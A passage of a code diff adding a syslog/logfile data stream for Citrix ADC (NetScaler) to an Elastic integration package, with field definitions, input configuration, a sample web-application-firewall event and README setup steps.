long + - name: sslvpn_client_type + type: keyword + - name: sso_status + type: keyword + - name: start_time + type: date + - name: start_time_timezone + type: keyword + - name: startup_duration + type: long + - name: status + type: keyword + - name: subject_name + type: keyword + - name: timestamp + type: date + - name: timezone + type: keyword + - name: total_bytes_received + type: long + - name: total_bytes_send + type: long + - name: total_bytes_wire_recieved + type: keyword + - name: total_bytes_wire_send + type: keyword + - name: total_compressed_bytes_recieved + type: long + - name: total_compressed_bytes_send + type: long + - name: total_http_header_length + type: long + - name: total_policies_allowed + type: long + - name: total_policies_denied + type: long + - name: total_tcp_connections + type: long + - name: total_udp_flows + type: long + - name: translated_destination + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: transport + type: keyword + - name: type + type: keyword + - name: unknown_content_type + type: keyword + - name: url + type: keyword + - name: url_length + type: long + - name: user + type: keyword + - name: useremail + type: keyword + - name: username + type: keyword + - name: valid_from + type: date + - name: valid_to + type: date + - name: value + type: keyword + - name: violation_type + type: keyword + - name: vserver + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: watch_id + type: keyword diff --git a/packages/citrix_adc/data_stream/log/manifest.yml b/packages/citrix_adc/data_stream/log/manifest.yml new file mode 100644 index 00000000000..fa191448509 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/manifest.yml @@ -0,0 +1,238 @@ +title: Citrix ADC logs +type: logs +streams: + - input: udp + title: Citrix ADC logs + enabled: false + description: Collect Citrix ADC logs (via Syslog). + template_path: udp.yml.hbs + vars: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - citrix_adc.log + - forwarded + - name: listen_address + type: text + title: Listen Address + description: The bind address to listen for UDP connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false + required: true + show_user: true + default: localhost + - name: listen_port + type: integer + title: Listen Port + description: The UDP port number to listen on. + multi: false + required: true + show_user: true + default: 9521 + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve citrix_adc.log fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: udp_options + type: yaml + title: Custom UDP Options + multi: false + required: false + show_user: false + default: | + #max_message_size: 50KiB + #timeout: 300s + description: Specify custom configuration options for the UDP input. + - name: tz_offset + type: text + title: Timezone + multi: false + required: false + show_user: false + default: UTC + description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting syslog timestamps without a time zone. + - input: tcp + title: Citrix ADC logs + enabled: false + description: Collect Citrix ADC logs (via Syslog). + template_path: tcp.yml.hbs + vars: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - citrix_adc.log + - forwarded + - name: listen_address + type: text + title: Listen Address + description: The bind address to listen for TCP connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false + required: true + show_user: true + default: localhost + - name: listen_port + type: integer + title: Listen Port + description: The TCP port number to listen on. + multi: false + required: true + show_user: true + default: 9522 + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve citrix_adc.log fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- + - name: tcp_options + type: yaml + title: Custom TCP Options + multi: false + required: false + show_user: false + default: | + #max_message_size: 50KiB + #max_connections: 1 + description: Specify custom configuration options for the TCP input. + - name: tz_offset + type: text + title: Timezone + multi: false + required: false + show_user: false + default: UTC + description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting syslog timestamps without a time zone. + - input: logfile + enabled: false + title: Citrix ADC logs + description: Collect Citrix ADC logs. + vars: + - name: paths + type: text + title: Paths + multi: true + required: true + show_user: true + default: + - /var/log/citrix-adc.log + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - citrix_adc.log + - forwarded + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve citrix_adc.log fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: tz_offset + type: text + title: Timezone + multi: false + required: false + show_user: false + default: UTC + description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting syslog timestamps without a time zone. diff --git a/packages/citrix_adc/data_stream/log/sample_event.json b/packages/citrix_adc/data_stream/log/sample_event.json new file mode 100644 index 00000000000..ab565459a8e --- /dev/null +++ b/packages/citrix_adc/data_stream/log/sample_event.json @@ -0,0 +1,113 @@ +{ + "@timestamp": "2012-12-18T21:46:17.000Z", + "agent": { + "ephemeral_id": "2976e761-4399-4de7-8ea0-97ea83ec7726", + "id": "418f7c57-c332-4913-b3ec-ddaa31f832a0", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "profile1", + "session_id": "IliG4Dxp1SjOhKVRDVBXmqvAaIcA000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "data_stream": { + "dataset": "citrix_adc.log", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.12.0" + }, + "elastic_agent": { + "id": "418f7c57-c332-4913-b3ec-ddaa31f832a0", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "agent_id_status": "verified", + "dataset": "citrix_adc.log", + "id": "465", + "ingested": "2024-03-20T08:51:14Z", + "original": "Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "severity": 6, + "timezone": "+00:00" + }, + "http": { + "request": { + "id": "535", + "method": "GET" + } + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "192.168.249.4:48549" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 54711 + }, + "tags": [ + "preserve_original_event", + "citrix_adc.log", + "forwarded" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/login_post.html?abc\\=def", + "path": "/FFC/login_post.html", + "query": "abc\\=def", + "scheme": "http" + } +} \ No newline at end of file diff --git a/packages/citrix_adc/docs/README.md b/packages/citrix_adc/docs/README.md index 9b78a3cac81..e1f420531ba 100644 --- a/packages/citrix_adc/docs/README.md +++ b/packages/citrix_adc/docs/README.md @@ -4,9 +4,11 @@ The Citrix ADC integration allows you to monitor your Citrix ADC instance. Citrix ADC is an application delivery controller that performs application-specific traffic analysis to intelligently distribute, optimize, and secure Layer 4 - Layer 7 (L4–L7) network traffic for web applications. +The Citrix Web App Firewall prevents security breaches, data loss, and possible unauthorized modifications to websites that access sensitive business or customer information. It does so by filtering both requests and responses, examining them for evidence of malicious activity, and blocking requests that exhibit such activity. Your site is protected not only from common types of attacks, but also from new, as yet unknown attacks. In addition to protecting web servers and websites from unauthorized access, the Web App Firewall protects against vulnerabilities in legacy CGI code or scripts, web frameworks, web server software, and other underlying operating systems. + Use the Citrix ADC integration to: -Collect metrics related to the interface, lbvserver, service, system and vpn. +Collect metrics related to the interface, lbvserver, service, system, vpn and logs. Create visualizations to monitor, measure and analyze the usage trend and key data, and derive business insights. Create alerts to reduce the MTTD and also the MTTR by referencing relevant logs when troubleshooting an issue. @@ -18,12 +20,37 @@ The Citrix ADC integration collects metrics data. Metrics give you insight into the statistics of the Citrix ADC. Metrics data streams collected by the Citrix ADC integration include [interface](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/network/interface/), [lbvserver](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/lb/lbvserver/), [service](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/basic/service/), [system](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/system/system/) and [vpn](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/vpn/vpn/), so that the user could monitor and troubleshoot the performance of the Citrix ADC instances. +**Log** is used to retrieve Citrix Netscaler logs. See more details in the documentation [here](https://developer-docs.netscaler.com/en-us/netscaler-syslog-message-reference/current-release). + Note: -- Users can monitor and see the metrics inside the ingested documents for Citrix ADC in the logs-* index pattern from `Discover`. +- Users can monitor and see the metrics and logs inside the ingested documents for Citrix ADC in the logs-* index pattern from `Discover`. +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.12.0**. ## Compatibility -This integration has been tested against Citrix ADC `v13.0` and `v13.1`. +This integration has been tested against Citrix ADC `v13.0`, `v13.1` and `v14.1`. ## Prerequisites @@ -39,10 +66,41 @@ Example Host Configuration: `http://localhost:9080` For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. +### Steps for configuring CEF format: + +1. Navigate to **Security** the NetScaler GUI. +2. Click **Application Firewall** node. +3. Select Change Engine Settings. +4. Enable CEF Logging. + +**Note**: It is recommended to configure the application firewall to enable CEF-formatted logs. + +### Steps for configuring Syslog format: + +The Citrix WAF GUI can be used to configure syslog servers and WAF message types to be sent to the syslog servers. Refer to [How to Send Application Firewall Messages to a Separate Syslog Server](https://support.citrix.com/article/CTX138973) and [How to Send NetScaler Application Firewall Logs to Syslog Server and NS.log](https://support.citrix.com/article/CTX211543) for details. + ## Validation After the integration is successfully configured, clicking on the Assets tab of the Citrix ADC Integration should display a list of available dashboards. Click on the dashboard available for your configured datastream. It should be populated with the required data. +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Citrix ADC +3. Click on the "Citrix ADC" integration from the search results. +4. Click on the "Add Citrix ADC" button to add the integration. +5. While adding the integration, if you want to collect logs via logfile, keep **Collect logs from Citrix ADC via file** toggle on and then configure following parameters: + - Paths + + or if you want to collect logs via TCP, keep **Collect logs from Citrix ADC via TCP** toggle on and then configure following parameters: + - Listen Address + - Listen Port + + or if you want to collect logs via UDP, keep **Collect logs from Citrix ADC via UDP** toggle on and and then configure following parameters: + - Listen Address + - Listen Port +6. Save the integration. + ### Troubleshooting #### Dummy values @@ -1056,3 +1114,529 @@ An example event for `vpn` looks as following: | host.ip | Host ip addresses. | ip | | | input.type | Type of Filebeat input. | keyword | | | tags | List of keywords used to tag each event. | keyword | | + + +### Logs + +The `citrix_adc.log` dataset provides events from the configured syslog server. + +An example event for `log` looks as following: + +```json +{ + "@timestamp": "2012-12-18T21:46:17.000Z", + "agent": { + "ephemeral_id": "2976e761-4399-4de7-8ea0-97ea83ec7726", + "id": "418f7c57-c332-4913-b3ec-ddaa31f832a0", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "profile1", + "session_id": "IliG4Dxp1SjOhKVRDVBXmqvAaIcA000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "data_stream": { + "dataset": "citrix_adc.log", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.12.0" + }, + "elastic_agent": { + "id": "418f7c57-c332-4913-b3ec-ddaa31f832a0", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "agent_id_status": "verified", + "dataset": "citrix_adc.log", + "id": "465", + "ingested": "2024-03-20T08:51:14Z", + "original": "Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "severity": 6, + "timezone": "+00:00" + }, + "http": { + "request": { + "id": "535", + "method": "GET" + } + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "192.168.249.4:48549" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 54711 + }, + "tags": [ + "preserve_original_event", + "citrix_adc.log", + "forwarded" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/login_post.html?abc\\=def", + "path": "/FFC/login_post.html", + "query": "abc\\=def", + "scheme": "http" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Date/time when the event originated. This is the date/time extracted from the event, typically representing when the event was generated by the source. If the event source has no original timestamp, this value is typically populated by the first time the event was received by the pipeline. Required field for all events. | date | +| citrix.cef_format | Whether the logging is in Citrix CEF format. | boolean | +| citrix.cef_version | The CEF format version used in the logs. | keyword | +| citrix.default_class | Whether the event class was the default. | boolean | +| citrix.detail | The CEF or Citrix Native format details for the event. | keyword | +| citrix.device_event_class_id | The ID of the event class. | keyword | +| citrix.device_product | The model of the appliance. | keyword | +| citrix.device_vendor | The name of the vendor for the device. | keyword | +| citrix.device_version | The version of the device. | keyword | +| citrix.extended | Additional data associated with the event. | flattened | +| citrix.facility | The logging facility. | keyword | +| citrix.host | The name of the host receiving the logs. | keyword | +| citrix.hostname | The name of the host receiving the logs. | keyword | +| citrix.name | The name of the security check. | keyword | +| citrix.ppe_id | Packet Processing Engine ID. | keyword | +| citrix.priority | The logging priority. | keyword | +| citrix.profile_name | The name of the profile that raised the event. | keyword | +| citrix.session_id | The ID for the session. | keyword | +| citrix.severity | The severity of the event. | keyword | +| citrix.signature_violation_category | The category that the violation is grouped into. | keyword | +| citrix_adc.log.access | | keyword | +| citrix_adc.log.access_type | | keyword | +| citrix_adc.log.action | | keyword | +| citrix_adc.log.adm_user | | keyword | +| citrix_adc.log.app.launch_time | | keyword | +| citrix_adc.log.app.name | | keyword | +| citrix_adc.log.app.process_id | | long | +| citrix_adc.log.app.termination_time | | keyword | +| citrix_adc.log.app.termination_type | | keyword | +| citrix_adc.log.appfw_rfc_profile | | keyword | +| citrix_adc.log.application_name | | keyword | +| citrix_adc.log.auto_deploy_mins | | long | +| citrix_adc.log.browser | | keyword | +| citrix_adc.log.browser_type | | keyword | +| citrix_adc.log.bytes.received | | long | +| citrix_adc.log.bytes.sent | | long | +| citrix_adc.log.call_id | | keyword | +| citrix_adc.log.callee.domain_name | | keyword | +| citrix_adc.log.callee.user_name | | keyword | +| citrix_adc.log.caller.domain_name | | keyword | +| citrix_adc.log.caller.user_name | | keyword | +| citrix_adc.log.category | | keyword | +| citrix_adc.log.category_group | | keyword | +| citrix_adc.log.certificate_key_pair | | keyword | +| citrix_adc.log.channel_id_1 | | long | +| citrix_adc.log.channel_id_1_val | | long | +| citrix_adc.log.channel_id_2 | | long | +| citrix_adc.log.channel_id_2_val | | long | +| citrix_adc.log.channel_id_3 | | long | +| citrix_adc.log.channel_id_3_val | | long | +| citrix_adc.log.channel_id_4 | | long | +| citrix_adc.log.channel_id_4_val | | long | +| citrix_adc.log.channel_id_5 | | long | +| citrix_adc.log.channel_id_5_val | | long | +| citrix_adc.log.channel_update.begin | | keyword | +| citrix_adc.log.channel_update.end | | keyword | +| citrix_adc.log.cipher_suite | | keyword | +| citrix_adc.log.client_cookie | | keyword | +| citrix_adc.log.client_hostname | | keyword | +| citrix_adc.log.client_ip | | ip | +| citrix_adc.log.client_launcher | | keyword | +| citrix_adc.log.client_port | | long | +| citrix_adc.log.client_security_check_status | | keyword | +| citrix_adc.log.client_security_expression | | keyword | +| citrix_adc.log.client_type | | keyword | +| citrix_adc.log.client_version | | keyword | +| citrix_adc.log.clientside.jitter | | long | +| citrix_adc.log.clientside.packet_retransmits | | long | +| citrix_adc.log.clientside.rtt | | keyword | +| citrix_adc.log.clientside.rxbytes | | long | +| citrix_adc.log.clientside.txbytes | | long | +| citrix_adc.log.closure_reason | | keyword | +| citrix_adc.log.code | | keyword | +| citrix_adc.log.command | | keyword | +| citrix_adc.log.compression_ratio_recieved | | double | +| citrix_adc.log.compression_ratio_send | | double | +| citrix_adc.log.connection_id | | keyword | +| citrix_adc.log.connection_priority | | keyword | +| citrix_adc.log.content_length_bytes | | long | +| citrix_adc.log.content_type | | keyword | +| citrix_adc.log.content_type_mismatch | | keyword | +| citrix_adc.log.cookie_header_length | | long | +| citrix_adc.log.crl_name | | keyword | +| citrix_adc.log.customer_name | | keyword | +| citrix_adc.log.data | | keyword | +| citrix_adc.log.data_length | | long | +| citrix_adc.log.days_to_expire | | long | +| citrix_adc.log.deleted_rules | | long | +| citrix_adc.log.delink_time | | date | +| citrix_adc.log.delink_timezone | | keyword | +| citrix_adc.log.destination.ip | | ip | +| citrix_adc.log.destination.port | | long | +| citrix_adc.log.device_serial_number | | keyword | +| citrix_adc.log.domain | | keyword | +| citrix_adc.log.domain_name | | keyword | +| citrix_adc.log.duration | | keyword | +| citrix_adc.log.end_time | | date | +| citrix_adc.log.end_time_timezone | | keyword | +| citrix_adc.log.errmsg | | keyword | +| citrix_adc.log.error | | keyword | +| citrix_adc.log.error_code | | keyword | +| citrix_adc.log.error_line | | keyword | +| citrix_adc.log.failure_reason | | keyword | +| citrix_adc.log.field_name | | keyword | +| citrix_adc.log.field_type | | keyword | +| citrix_adc.log.flags | | keyword | +| citrix_adc.log.group | | keyword | +| citrix_adc.log.groups | | keyword | +| citrix_adc.log.handshake_time | | keyword | +| citrix_adc.log.header | | keyword | +| citrix_adc.log.header_length | | long | +| citrix_adc.log.hit.count | | long | +| citrix_adc.log.hit.rule | | keyword | +| citrix_adc.log.hostname | | keyword | +| citrix_adc.log.html_url | | keyword | +| citrix_adc.log.http_resources_accessed | | keyword | +| citrix_adc.log.ica_rtt | | keyword | +| citrix_adc.log.icap_server.ip | | ip | +| citrix_adc.log.icap_server.port | | long | +| citrix_adc.log.id | | keyword | +| citrix_adc.log.infomsg | | keyword | +| citrix_adc.log.ip_address | | ip | +| citrix_adc.log.issuer_name | | keyword | +| citrix_adc.log.l7_latency.max_notify_count | | long | +| citrix_adc.log.l7_latency.notify_interval | | long | +| citrix_adc.log.l7_latency.threshold_factor | | long | +| citrix_adc.log.l7_latency.waittime | | keyword | +| citrix_adc.log.l7_threshold_breach.avg_clientside_latency | | long | +| citrix_adc.log.l7_threshold_breach.avg_serverside_latency | | long | +| citrix_adc.log.l7_threshold_breach.max_clientside_latency | | long | +| citrix_adc.log.l7_threshold_breach.max_serverside_latency | | long | +| citrix_adc.log.last_contact | | keyword | +| citrix_adc.log.launch_mechanism | | keyword | +| citrix_adc.log.ldap_scope | | keyword | +| citrix_adc.log.license_limit | | long | +| citrix_adc.log.logout_method | | keyword | +| citrix_adc.log.matched_url | | keyword | +| citrix_adc.log.max_allowed.cookie_header_length | | long | +| citrix_adc.log.max_allowed.header_length | | long | +| citrix_adc.log.max_allowed.query_string_length | | long | +| citrix_adc.log.max_allowed.total_http_header_length | | long | +| citrix_adc.log.max_allowed.url_length | | long | +| citrix_adc.log.max_restarts | | long | +| citrix_adc.log.message | | keyword | +| citrix_adc.log.method | | keyword | +| citrix_adc.log.min_l7_latency | | long | +| citrix_adc.log.mode | | keyword | +| citrix_adc.log.module_path | | keyword | +| citrix_adc.log.nat.ip | | ip | +| citrix_adc.log.nat.port | | long | +| citrix_adc.log.natted.ip | | ip | +| citrix_adc.log.natted.port | | long | +| citrix_adc.log.newly_added_rules | | long | +| citrix_adc.log.non_http_services_accessed | | keyword | +| citrix_adc.log.nsica_session.acr_count | | long | +| citrix_adc.log.nsica_session.client.ip | | ip | +| citrix_adc.log.nsica_session.client.port | | long | +| citrix_adc.log.nsica_session.reconnect_count | | long | +| citrix_adc.log.nsica_session.server.ip | | ip | +| citrix_adc.log.nsica_session.server.port | | long | +| citrix_adc.log.nsica_session.status | | keyword | +| citrix_adc.log.nsica_status | | keyword | +| citrix_adc.log.old_pid | | long | +| citrix_adc.log.origin_server.ip | | ip | +| citrix_adc.log.origin_server.port | | long | +| citrix_adc.log.original_destination.ip | | ip | +| citrix_adc.log.original_destination.port | | long | +| citrix_adc.log.pcre_error_code | | keyword | +| citrix_adc.log.peid | | keyword | +| citrix_adc.log.policy_action | | keyword | +| citrix_adc.log.policy_violation | | keyword | +| citrix_adc.log.process.id | | long | +| citrix_adc.log.process.name | | keyword | +| citrix_adc.log.profile | | keyword | +| citrix_adc.log.protocol | | keyword | +| citrix_adc.log.protocol_version | | keyword | +| citrix_adc.log.query_string_length | | long | +| citrix_adc.log.reason | | keyword | +| citrix_adc.log.referer_header | | keyword | +| citrix_adc.log.register | | keyword | +| citrix_adc.log.remote_ip | | ip | +| citrix_adc.log.reputation | | long | +| citrix_adc.log.request.bytes_sent | | long | +| citrix_adc.log.request.path | | keyword | +| citrix_adc.log.response.bytes_sent | | long | +| citrix_adc.log.response.code | | long | +| citrix_adc.log.rewritten_url | | keyword | +| citrix_adc.log.rule | | keyword | +| citrix_adc.log.rule_id | | keyword | +| citrix_adc.log.sequence_number | | long | +| citrix_adc.log.serial_number | | keyword | +| citrix_adc.log.server.ip | | ip | +| citrix_adc.log.server.name | | keyword | +| citrix_adc.log.server.port | | long | +| citrix_adc.log.server_authentication | | keyword | +| citrix_adc.log.serverside.jitter | | long | +| citrix_adc.log.serverside.packet_retransmits | | long | +| citrix_adc.log.serverside.rtt | | keyword | +| citrix_adc.log.service | | keyword | +| citrix_adc.log.session | | keyword | +| citrix_adc.log.session_end_time | | keyword | +| citrix_adc.log.session_guid | | keyword | +| citrix_adc.log.session_id | | keyword | +| citrix_adc.log.session_setup_time | | keyword | +| citrix_adc.log.signature_algorithm | | keyword | +| citrix_adc.log.signature_id | | keyword | +| citrix_adc.log.source.ip | | ip | +| citrix_adc.log.source.port | | long | +| citrix_adc.log.spcb_id | | keyword | +| citrix_adc.log.ssl_relay.address | | ip | +| citrix_adc.log.ssl_relay.port | | long | +| citrix_adc.log.sslvpn_client_type | | keyword | +| citrix_adc.log.sso_status | | keyword | +| citrix_adc.log.start_time | | date | +| citrix_adc.log.start_time_timezone | | keyword | +| citrix_adc.log.startup_duration | | long | +| citrix_adc.log.status | | keyword | +| citrix_adc.log.subject_name | | keyword | +| citrix_adc.log.timestamp | | date | +| citrix_adc.log.timezone | | keyword | +| citrix_adc.log.total_bytes_received | | long | +| citrix_adc.log.total_bytes_send | | long | +| citrix_adc.log.total_bytes_wire_recieved | | keyword | +| citrix_adc.log.total_bytes_wire_send | | keyword | +| citrix_adc.log.total_compressed_bytes_recieved | | long | +| citrix_adc.log.total_compressed_bytes_send | | long | +| citrix_adc.log.total_http_header_length | | long | +| citrix_adc.log.total_policies_allowed | | long | +| citrix_adc.log.total_policies_denied | | long | +| citrix_adc.log.total_tcp_connections | | long | +| citrix_adc.log.total_udp_flows | | long | +| citrix_adc.log.translated_destination.ip | | ip | +| citrix_adc.log.translated_destination.port | | long | +| citrix_adc.log.transport | | keyword | +| citrix_adc.log.type | | keyword | +| citrix_adc.log.unknown_content_type | | keyword | +| citrix_adc.log.url | | keyword | +| citrix_adc.log.url_length | | long | +| citrix_adc.log.user | | keyword | +| citrix_adc.log.useremail 